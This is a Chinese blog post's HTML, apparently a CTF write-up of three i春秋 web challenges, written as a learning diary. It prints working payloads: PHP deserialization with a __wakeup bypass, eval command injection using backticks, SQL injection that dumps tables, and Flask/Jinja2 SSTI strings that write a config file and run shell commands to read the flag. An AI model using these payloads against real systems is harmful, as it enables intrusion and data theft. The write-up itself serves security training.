<!DOCTYPE HTML>
<html class="no-js" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
    <!--[if lte IE 9]>
<meta http-equiv="refresh" content="0;url=http://yoursite.com/warn.html">
<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-DNS-Prefetch-Control" content="on">
<link rel="dns-prefetch" href="http://yoursite.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="prefetch" href="http://yoursite.com">
<link rel="prefetch" href="//www.google-analytics.com">


<link rel="prerender" href="http://yoursite.com">

<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">
<meta http-equiv="mobile-agent" content="format=html5; url=http://yoursite.com">
<meta name="author" content="John Doe">
<link rel="stylesheet" href="/css/JSimple.css">

<link rel="shortcut icon" href="/images/favicon.png">


<title>hash - Hexo</title>

<meta name="keywords" content>

<meta name="description " content>

    <script type="text/x-mathjax-config">
        MathJax.Hub.Config({
            tex2jax: {
                inlineMath: [ ['$','$'], ["\\(","\\)"] ],
                processEscapes: true
            }
        });
    </script>


    

    

</head>
<body>
<div id="nav">
    <nav class="nav-menu">
        <a class="site-name current" href="/" title="说">说</a>
        <a class="site-index current" href="/"><i class="fa fa-home"></i><span>Home</span></a>
        <a href="/archives" title="Archives"><i class="fa fa-archives"></i><span>Archives</span></a>
        <a href="/tags" title="Tags"><i class="fa fa-tags"></i><span>Tags</span></a>
        <!-- custom single page of menus -->
        
        
        <a href="/help" title="帮助">
            <i class="fa fa-question-circle"></i>
            <span>帮助</span>
        </a>
        
    </nav>
</div>

<div class="nav-user">
    <a class="btn-search" href="#"><i class="fa fa-search"></i></a>
    <a class="btn-read-mode" href="#"><i class="fa fa-sun-o"></i></a>
    <a class="btn-sns-qr" href="javascript:"><i class="fa fa-telegram"></i></a>
</div>

<div id="wrapper" class="clearfix">
    <div id="body">
        <div class="main" id="main">
            <div id="cover">
    <div class="cover-img"></div>
    <div class="cover-info">
        
        <h1 class="cover-siteName">说IT</h1>
        <h3 class="cover-siteTitle">用代码摇滚这个世界</h3>
        <p class="cover-siteDesc">一个关注技术与人文的IT博客</p>
        <div class="cover-sns">
            
    &nbsp;&nbsp;<div class="btn btn-telegram">
        <a href="http://t.me/kunyintang" target="_blank" title="telegram" ref="friend">
            <i class="fa fa-telegram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-instagram">
        <a href="https://www.instagram.com/mtangsir/" target="_blank" title="instagram" ref="friend">
            <i class="fa fa-instagram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-twitter">
        <a href="https://twitter.com/tangkunyin" target="_blank" title="twitter" ref="friend">
            <i class="fa fa-twitter"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-github">
        <a href="https://github.com/tangkunyin" target="_blank" title="github" ref="friend">
            <i class="fa fa-github"></i>
        </a>
    </div>


        </div>
    </div>
</div>

            <div class="page-title">
    <ul>
        <li><a href="/">Recent Posts</a></li>
        
        
        
        <li class="page-search">
    <form id="search" class="search-form">
        <input type="text" readonly="readonly" id="local-search-input-tip" placeholder="click to search...">
        <button type="button" disabled="disabled" class="search-form-submit"><i class="fa fa-search"></i></button>
    </form>
</li>

    </ul>
</div>
<div class="main-inner">
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
        <div class="post-header">
            <div class="post-author clearfix">
                <a class="avatar fleft" href="https://shuoit.net" target="_blank">
                    <img width="48" src="/images/favicon.png" alt="avatar">
                </a>
                <p><span class="label">Author</span>
                    <a href="https://shuoit.net" target="_blank">纠结伦</a>
                    <span title="Last edited at&nbsp;2019-05-13">2019-05-13</span>
                </p>
                <p>一个搬🧱的劳斯基😁️️</p>
            </div>
            <h2 class="post-title">Hash</h2>
            <div class="post-meta">
                emm... 2583 words in the article |
                you are the&nbsp;<span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>th friend who reading now
            </div>
        </div>
        <div class="post-content markdown-body">
            <h2 id="Hash"><a href="#Hash" class="headerlink" title="Hash"></a>Hash</h2><p>转自：<a href="https://www.jianshu.com/p/ea09e26228ea" target="_blank" rel="noopener">https://www.jianshu.com/p/ea09e26228ea</a><br>这道题我觉得超级好，今天是一个糟糕的一天，遇到这道题让我的心情变好了。。今天也总结一下今天的各种坎坷与收获，坎坷很多，收获也很多。。。。<br>首先打开网页后，查看源码：<br><img src="/2019/05/13/Hash/Hash-bfd95575.png" alt><br>再点击链接后，查看源码：<br><img src="/2019/05/13/Hash/Hash-8fa2bea2.png" alt><br>这两个源码结合起来一起看，首先md5解析那个hash得到kkkkkk01123，可以看到大致意思为sign为kkkkkk01 而只需要将可以换成一个不是123的数字就可以，我尝试了111，得到：<br><img src="/2019/05/13/Hash/Hash-d1c4f4ee.png" alt><br>构造payload：<br>view-source:<a href="http://95b3c48fc5824e219188eaed63dcb32ca659fb649145498b.changame.ichunqiu.com/index.php?key=111&amp;hash=adaa10eef3a02754da03b5a3a6f40ae6" target="_blank" rel="noopener">http://95b3c48fc5824e219188eaed63dcb32ca659fb649145498b.changame.ichunqiu.com/index.php?key=111&amp;hash=adaa10eef3a02754da03b5a3a6f40ae6</a><br><img src="/2019/05/13/Hash/Hash-87ca125c.png" alt><br>然后进入后，得到代码，如下：<br><img src="/2019/05/13/Hash/Hash-515bc42f.png" alt><br>接受一个var参数base64解码然后正则匹配如果匹配到程序结束执行 否则就进行反序列化可以发现是一个文件读取类 但是会在执行<strong>destruct之前会调用</strong>wakeup来修改掉file变量这里利用一个php的bug简单来说就是当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 然后绕过正则的话我们可以在对象长度前加一个 + 号<br>脚本如下：<br><img src="/2019/05/13/Hash/Hash-c6d3b0dd.png" alt><br>最后得到：<br>TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==<br>Gu3ss_m3_h2h2.php?var=上面的结果将其传回，然后返回了f15g_1s_here.php的源码。如下</p>
<p> &lt;?php<br>if (isset($_GET[‘val’])) {<br>    $val = $_GET[‘val’];<br>    eval(‘$value=”‘ . addslashes($val) . ‘“;’);<br>} else {<br>    die(‘hahaha!’);<br>}</p>
<p>?&gt;</p>
<p>接下来就是利用 上面的eval()函数来找到flag，它将传进去的参数转义处理，然后执行，这里val是可控的，所以构造payload<br>f15g_1s_here.php?val=${eval(“echo ‘ls’ ;”)}</p>
<p>但是addslashes对单引号，双引号，反斜杠进行了转义，所以只能用反引号(<code>)。而且反斜杠被转义了，使用不了引号嵌套。所以想到再利用一次get请求。payload如下
f15g_1s_here.php?val=${eval($_GET[a])}&amp;a=echo</code>ls`;//注意最后的分号。</p>
<p>得到True_F1ag_i3_Here_233.php</p>
<p>修改payload</p>
<p>f15g_1s_here.php?val=${eval($_GET[a])}&amp;a=echo <code>cat True_F1ag_i3_Here_233.php</code>;</p>
<p>审查元素得到flag</p>
<h2 id="Try"><a href="#Try" class="headerlink" title="Try"></a>Try</h2><p>这道题后面的爆破我没有爆破，因为数量级太大了，作者说的用什么概率算也没有听明白，觉得后面很难，就先记一下SQL注入的过程。<br>点击guest，看看这里有没有注入点。。<br><img src="/2019/05/13/Hash/Hash-269615cb.png" alt><br><img src="/2019/05/13/Hash/Hash-c568302f.png" alt><br>可以看到得到两个不同的结果，说明存在注入。。<br>然后用order by判断字长：<br><img src="/2019/05/13/Hash/Hash-62c61ab1.png" alt><br><img src="/2019/05/13/Hash/Hash-5245e976.png" alt><br>字长为1.。。然后爆出table_name<br><img src="/2019/05/13/Hash/Hash-5245e976.png" alt><br><img src="/2019/05/13/Hash/Hash-9ad40dac.png" alt><br>爆出两个table_name为token和user，接下来爆column_name:<br>token有两列，分别为username和token：<br><img src="/2019/05/13/Hash/Hash-2d522e4a.png" alt><br><img src="/2019/05/13/Hash/Hash-522106db.png" alt><br>然后user爆破方式和token一样，得到username，password,level；<br>最后爆出数据，结果如下：<br><img src="/2019/05/13/Hash/Hash-9f4f7fcf.png" alt><br><img src="/2019/05/13/Hash/Hash-3e3ed3dd.png" alt><br>然后再研究一下源码。。。发现了一个(＾－＾)V<br><img src="/2019/05/13/Hash/Hash-6af3ab82.png" alt><br>访问reset.php：<br>提交刚刚爆出来的member。。。。<br>查看一下源码：<br><img src="/2019/05/13/Hash/Hash-9c2a7d33.png" alt><br>看一个这个，搜一下$6$rounds=66$这种类似的，可以看到一个相关的php函数crypt，然后寻找一下类似于答案的这种结果：<br><img src="/2019/05/13/Hash/Hash-caba3fbf.png" alt><br>这个很像，但是好像有点不同。题目里的round为66，而找到的这个round为5000，然后可以看到题目给了提示：<br><img src="/2019/05/13/Hash/Hash-4a25b282.png" alt><br>然后后面我就没有做了，因为太变态了。。。。苦笑<br>思路是先生成一个hash字典，然后每一次询问是否在这个字典，如果不在，则需要重置。因为数据太大，我放弃了。。。</p>
<h2 id="Fuzz"><a href="#Fuzz" class="headerlink" title="Fuzz"></a>Fuzz</h2><p>这道题真的很爽，哈哈哈 我看了很长时间，学到了很多东西。。<br>首先学会了用bp进行简单的爆破，以前对bp的了解一直局限于抓包和repeater。<br>Fuzz过程如下：<br><img src="/2019/05/13/Hash/Hash-3bcaf59b.png" alt><br>字典选择红色标注的那一个：<br><img src="/2019/05/13/Hash/Hash-9085fc2e.png" alt><br>最后会发现name的长度和别人的不一样，所以爆出了name。<br>接下来就是一个公开的漏洞的问题，我发现这个漏洞特别有意思。。可以看一下以为大佬写的：<br><a href="https://www.kingkk.com/2018/06/Flask-Jinja2-SSTI-python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/" target="_blank" rel="noopener">https://www.kingkk.com/2018/06/Flask-Jinja2-SSTI-python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/</a><br>找到一些公开的payload：<br>name=%7B%7B ‘’.<strong>class</strong>.<strong>mro</strong>[2].<strong>subclasses</strong>()<a href="&#39;/tmp/owned.cfg&#39;," title="w">40</a>.write(‘from subprocess import check_output\n\nRUNCMD = check_output\n’) %7D%7D<br>name=%7B%7B config.from_pyfile(‘/tmp/owned.cfg’) %7D%7D<br>name=%7B%7B%20config<a href="%27/usr/bin/id%27,shell=True">%27RUNCMD%27</a>%20%7D%7D<br>可以配置好相应的可以执行命令的环境。<br>得到：<br><img src="/2019/05/13/Hash/Hash-9193d922.png" alt><br>然后发现flag在/var/www/html/fl4g目录中，然后可以考虑读取文件的内容，但是经过尝试会发现一些要用到的命令都被过滤掉了。所以查看大佬的wp，发现了一种方法：<br>把print open(‘/var/www/html/fl4g’,’r’).read()编码成base64然后写入<br>name=%7B%7B%20config<a href="%27echo cHJpbnQgb3BlbignL3Zhci93d3cvaHRtbC9mbDRnJywncicpLnJlYWQoKQ==|base64 -d&gt;/tmp/get.py%27,shell=True">%27RUNCMD%27</a>%20%7D%7D<br>执行py<br>name=%7B%7B%20config<a href="%27python /tmp/get.py%27,shell=True">%27RUNCMD%27</a>%20%7D%7D[size=1em]得到最终的flag<br>这道题我学会了很多东西，还是很开心的。。。。</p>

        </div>
        <div class="post-tool">
            <a class="btn-thumbs-up" href="javascript:void(0);" data-cid="52" title="95">
                <i class="fa fa-thumbs-up" aria-hidden="true"></i> Donate
            </a>
        </div>
        
        <div class="post-tags">Tags：
            
            <a href="/tags/i春秋-CTF/">i春秋 CTF</a>
            
        </div>
        
    </article>
    
    <p style="text-align: center">This article just represents my own viewpoint. If there is something wrong, please correct me.</p>
    
    

    

</div>
<script src="/js/busuanzi.pure.mini.js"></script>


        </div><!-- end #main-->
    </div><!-- end #body -->
    <footer class="footer">
    <div class="footer-inner" style="text-align: center">
        <p>
            <a href="/about" title="About">About</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <!-- 自定义链接 -->
            <a href="/help" title="Help">Help</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/links" title="Links">Links</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/sitemap.xml" title="SiteMap">SiteMap</a>
        </p>
        <p>
            Has been established&nbsp<a href="/timeline" id="siteBuildingTime"></a>&nbspDays，<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="licence">Based on Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)</a><br>
            ©2017-<span id="cpYear"></span> Based on&nbsp<a href="http://hexo.io" target="_blank" rel="nofollow">Hexo</a>
            ，Theme by&nbsp&nbsp<a href="https://github.com/tangkunyin/hexo-theme-jsimple" target="_blank" rel="bookmark">JSimple</a>
            ，Author&nbsp<a href="https://shuoit.net" target="_blank" rel="friend">纠结伦</a>
            ，Hosted by <a href="https://pages.github.com/" target="_blank" rel="nofollow">GitHub Pages</a>
        </p>
    </div>
</footer>
<script src="/js/SimpleCore.js"></script>

</div>
<!-- search pop -->
<div class="popup search-popup local-search-popup">
    <div class="local-search-header clearfix">
        <span class="search-icon">
            <i class="fa fa-search"></i>
        </span>
        <span class="popup-btn-close">
            <i class="fa fa-times-circle"></i>
        </span>
        <div class="local-search-input-wrapper">
            <input id="local-search-input" spellcheck="false" type="text" autocomplete="off" placeholder="Input query keywords here...">
        </div>
    </div>
    <div id="local-search-result"></div>
</div>
<div class="fixed-btn">
    <a class="btn-gotop" href="javascript:"> <i class="fa fa-angle-up"></i></a>
</div>
<script>
    $(function () {
        var jsi_config = {
            buildingTime: '01/20/2018',
            current: $('.post-tags').length > 0 ? 'post' : 'archive',
            snsQRCode: '/images/sns-qrcode.png',
            donateImg: '/images/donate-qr.png',
            localSearch: { dbPath: '' },
            readMode: 'day'
        };
        
        SimpleCore.init(jsi_config);
        
    });
</script>
</body>
</html>
